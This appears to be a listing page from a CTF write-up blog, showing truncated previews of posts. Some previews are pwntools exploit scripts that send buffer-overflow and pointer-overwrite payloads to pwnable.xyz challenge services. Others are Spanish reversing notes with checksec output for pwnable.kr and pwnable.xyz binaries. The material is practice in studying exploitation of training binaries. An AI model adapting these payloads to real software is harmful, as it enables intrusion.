Exploit from pwn import * context.log_level = 'debug' p = remote("svc.pwnable.xyz",30031) #p = process('./two_targets') #gdb.attach(p,''' #break *0x00400bd1 #continue #''') payload = "Did_you_really_miss_the_"+"\xc8"+"T_b"+"\x7f"+"D"+"\x84"+"\xf3" p.recvuntil("> ") p.sendline("1") p.recvuntil("name: ") p.sendline(payload) p.recvuntil("> ") p.sendline("4") p.recvuntil("> ") p.interactive()
Exploit from pwn import * import time context.log_level = 'debug' p = remote("svc.pwnable.xyz",30016) #p = process('./note') #gdb.attach(p,''' #break *0x0000000000400a10 #continue #''') p.recvuntil("> ") p.sendline("1") p.recvuntil("Note len? ") p.sendline("38") p.recvuntil("note: ") payload = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x20\x12\x60\x00" p.sendline(payload) p.recvuntil("> ") p.sendline("2"..
Challenge GrownUp from pwnable.xyz nc svc.pwnable.xyz 30004 Exploit from pwn import * context.log_level = 'debug' p = remote("svc.pwnable.xyz",30004) #p = process('./GrownUpRedist') #gdb.attach(p,''' #break *0x0000000000400914 #continue #''') p.recvuntil("Are you 18 years or older? [y/N]: ") payload = "\x79"+"aaaBCCC"+"\x80\x10\x60" p.sendline(payload) p.recvuntil("Name: ") #payload = "AAAABBBBA..
Welcome Date: 11/01/2019-12/01/2019 @naivenom 5.1 Reconocimiento gef➤ checksec [+] checksec for '/home/binary/pwnable.xyz/welcome/challenge' Canary : Yes → value: 0x9ce8bf03e7ef2500 NX : Yes PIE : Yes Fortify : Yes RelRO : Full 5.2 Fast Pwn Analysis Si usamos GDB la dirección del main la localizo empezando debuggeando por el entrypoint, en mi caso 0x555555554920 Ponemos un breakpoint ahí y empez..
Brainfuck Date: 08/01/2019-09/01/2019 @naivenom 4.1 Reconocimiento gef➤ checksec [+] checksec for '/home/binary/pwnable.kr/brainfuck/bf' Canary : Yes NX : Yes PIE : No Fortify : No RelRO : Partial Canary and NX (No shellcode) 4.2 Deep Reversing Analysis Como no puede ser de otra manera vamos solo a centrarnos en realizar reversing instrucción por instrucción y tomar notas de que es lo que esta s..
Horcruxes Date: 05/01/2019-08/01/2019 @naivenom 3.1 Deep Reversing Analysis Primero vemos las protecciones y tiene NX habilitado en áreas como no ejecutable. gdb-peda$ checksec CANARY : disabled FORTIFY : disabled NX : ENABLED PIE : disabled RELRO : Partial Vemos las funciones que usa el binario, Non-debugging symbols: 0x0809fbec _init 0x0809fc20 seccomp_init@plt 0x0809fc30 read@plt 0x0809fc40 p..
Date: 30/12/2018-02/01/2019 @naivenom 2.1 Heap memory Esta asignada dinamicamente. La memoria es global esto quiere decir que es accesible desde cualquier "lugar" dentro del programa y no esta localizada en la función donde es allocated. Esto se logra usando 'punteros' para hacer referencia a la memoria asignada dinámicamente. stdlib.h --> Nos permite acceder, modificar y manejar dinámicamente l..
- Total
- Today
- Yesterday
- cracking
- return oriented programming
- write primitive
- pwnable.tw
- ASM
- leak libc
- stack pivot
- leak stack memory address
- theFaunia course
- canary
- fake stack frame
- buffer overflow
- hijacking redirection flow
- x64dbg
- 32Bit
- shellcode
- GOT Dereferencing/Overwriting
- arithmetic overflow/underflow
- open-redirect
- Call oriented programming
- Windows
- Pwnable.kr
- one gadget
- dnspy
- pwnable.xyz
- html injection
- XSS
- Backdoors
- use after free
- format string
일 | 월 | 화 | 수 | 목 | 금 | 토 |
---|---|---|---|---|---|---|
1 | 2 | 3 | 4 | 5 | ||
6 | 7 | 8 | 9 | 10 | 11 | 12 |
13 | 14 | 15 | 16 | 17 | 18 | 19 |
20 | 21 | 22 | 23 | 24 | 25 | 26 |
27 | 28 | 29 | 30 |